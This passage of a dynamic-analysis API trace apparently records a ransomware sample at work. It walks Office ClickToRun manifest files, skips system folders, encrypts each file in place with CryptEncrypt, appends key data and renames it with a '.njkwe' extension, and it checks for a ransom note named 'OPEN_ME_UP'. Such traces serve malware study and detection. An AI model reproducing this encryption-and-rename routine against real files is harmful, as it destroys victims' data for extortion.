ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed067a9a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd3999a72, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5fee, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", cAlternateFileName="C2BAB3~1.XML")) returned 1 [0071.755] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2="Windows") returned -1 [0071.755] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2="$Recycle.bin") returned 1 [0071.755] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2="System Volume Information") returned -1 [0071.755] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2="Program Files") returned -1 [0071.755] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2="Program Files (x86)") returned -1 [0071.755] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml") returned 121 [0071.756] StrStrIW (lpFirst="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpSrch=".njkwe") returned 0x0 [0071.756] lstrcmpW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0071.756] lstrcmpW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2="taridd") returned -1 [0071.756] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.ms", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0071.756] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0071.756] GetTickCount () returned 0x11524da [0071.756] GetTickCount () returned 0x11524da [0071.756] GetTickCount () returned 0x11524da [0071.756] GetTickCount () returned 0x11524da [0071.756] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0071.756] GetProcessHeap () returned 0xbe0000 [0071.756] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0071.756] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0071.781] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.414] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.414] GetProcessHeap () returned 0xbe0000 [0072.414] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0072.414] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.414] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0072.414] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0072.415] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0072.415] CloseHandle (hObject=0x434) returned 1 [0072.415] GetProcessHeap () returned 0xbe0000 [0072.415] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.415] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml_r00t_{3sXlE5}.njkwe") returned 141 [0072.415] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml_r00t_{3sxle5}.njkwe")) returned 1 [0072.416] GetProcessHeap () returned 0xbe0000 [0072.416] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.416] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed041918, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed041918, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd37f6035, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.proofing.msi.16.en-us.xml", cAlternateFileName="C24618~1.XML")) returned 1 [0072.416] lstrcmpiW (lpString1="C2RManifest.proofing.msi.16.en-us.xml", lpString2="Windows") returned -1 [0072.416] lstrcmpiW (lpString1="C2RManifest.proofing.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0072.416] lstrcmpiW (lpString1="C2RManifest.proofing.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0072.416] lstrcmpiW (lpString1="C2RManifest.proofing.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0072.416] lstrcmpiW (lpString1="C2RManifest.proofing.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0072.416] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml") returned 116 [0072.416] StrStrIW (lpFirst="C2RManifest.proofing.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0072.416] lstrcmpW (lpString1="C2RManifest.proofing.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.416] lstrcmpW (lpString1="C2RManifest.proofing.msi.16.en-us.xml", lpString2="taridd") returned -1 [0072.417] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.417] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.417] GetTickCount () returned 0x115276a [0072.417] GetTickCount () returned 0x115276a [0072.417] GetTickCount () returned 0x115276a [0072.417] GetTickCount () returned 0x115276a [0072.418] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0072.418] GetProcessHeap () returned 0xbe0000 [0072.418] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0072.418] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x7fa, lpOverlapped=0x0) returned 1 [0072.425] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffff806, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.426] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x7fa, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x7fa, lpOverlapped=0x0) returned 1 [0072.426] GetProcessHeap () returned 0xbe0000 [0072.426] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0072.426] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.426] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0072.426] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0072.426] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0072.426] CloseHandle (hObject=0x434) returned 1 [0072.426] GetProcessHeap () returned 0xbe0000 [0072.426] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.426] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 136 [0072.426] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0072.427] GetProcessHeap () returned 0xbe0000 [0072.427] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.427] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed041918, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed041918, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2b97d2d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12e4a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", cAlternateFileName="C2C6D1~1.XML")) returned 1 [0072.427] lstrcmpiW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2="Windows") returned -1 [0072.427] lstrcmpiW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2="$Recycle.bin") returned 1 [0072.427] lstrcmpiW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2="System Volume Information") returned -1 [0072.427] lstrcmpiW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2="Program Files") returned -1 [0072.427] lstrcmpiW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2="Program Files (x86)") returned -1 [0072.427] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml") returned 135 [0072.427] StrStrIW (lpFirst="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpSrch=".njkwe") returned 0x0 [0072.427] lstrcmpW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.427] lstrcmpW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2="taridd") returned -1 [0072.427] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publis", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.427] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.427] GetTickCount () returned 0x115277a [0072.427] GetTickCount () returned 0x115277a [0072.427] GetTickCount () returned 0x115277a [0072.428] GetTickCount () returned 0x115277a [0072.428] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0072.428] GetProcessHeap () returned 0xbe0000 [0072.428] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0072.428] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.429] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.429] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.430] GetProcessHeap () returned 0xbe0000 [0072.430] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0072.430] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.430] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0072.430] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0072.431] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0072.431] CloseHandle (hObject=0x434) returned 1 [0072.431] GetProcessHeap () returned 0xbe0000 [0072.431] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.431] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe") returned 155 [0072.431] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0072.431] GetProcessHeap () returned 0xbe0000 [0072.431] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.432] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed041918, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed041918, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd37374c5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3734, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.publishermui.msi.16.en-us.xml", cAlternateFileName="C2RMAN~4.XML")) returned 1 [0072.432] lstrcmpiW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml", lpString2="Windows") returned -1 [0072.432] lstrcmpiW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0072.432] lstrcmpiW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0072.432] lstrcmpiW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0072.432] lstrcmpiW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0072.432] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml") returned 120 [0072.432] StrStrIW (lpFirst="C2RManifest.publishermui.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0072.432] lstrcmpW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.432] lstrcmpW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml", lpString2="taridd") returned -1 [0072.432] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.432] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.432] GetTickCount () returned 0x115277a [0072.432] GetTickCount () returned 0x115277a [0072.432] GetTickCount () returned 0x115277a [0072.432] GetTickCount () returned 0x115277a [0072.432] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0072.432] GetProcessHeap () returned 0xbe0000 [0072.432] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0072.433] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.435] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.435] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.435] GetProcessHeap () returned 0xbe0000 [0072.435] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0072.435] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.436] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0072.436] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0072.436] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0072.436] CloseHandle (hObject=0x434) returned 1 [0072.436] GetProcessHeap () returned 0xbe0000 [0072.436] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.436] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 140 [0072.436] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0072.437] GetProcessHeap () returned 0xbe0000 [0072.437] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.437] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed01b5ef, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed01b5ef, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd29ce0e8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb27ee, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", cAlternateFileName="C2RMAN~3.XML")) returned 1 [0072.437] lstrcmpiW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2="Windows") returned -1 [0072.437] lstrcmpiW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2="$Recycle.bin") returned 1 [0072.437] lstrcmpiW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2="System Volume Information") returned -1 [0072.437] lstrcmpiW 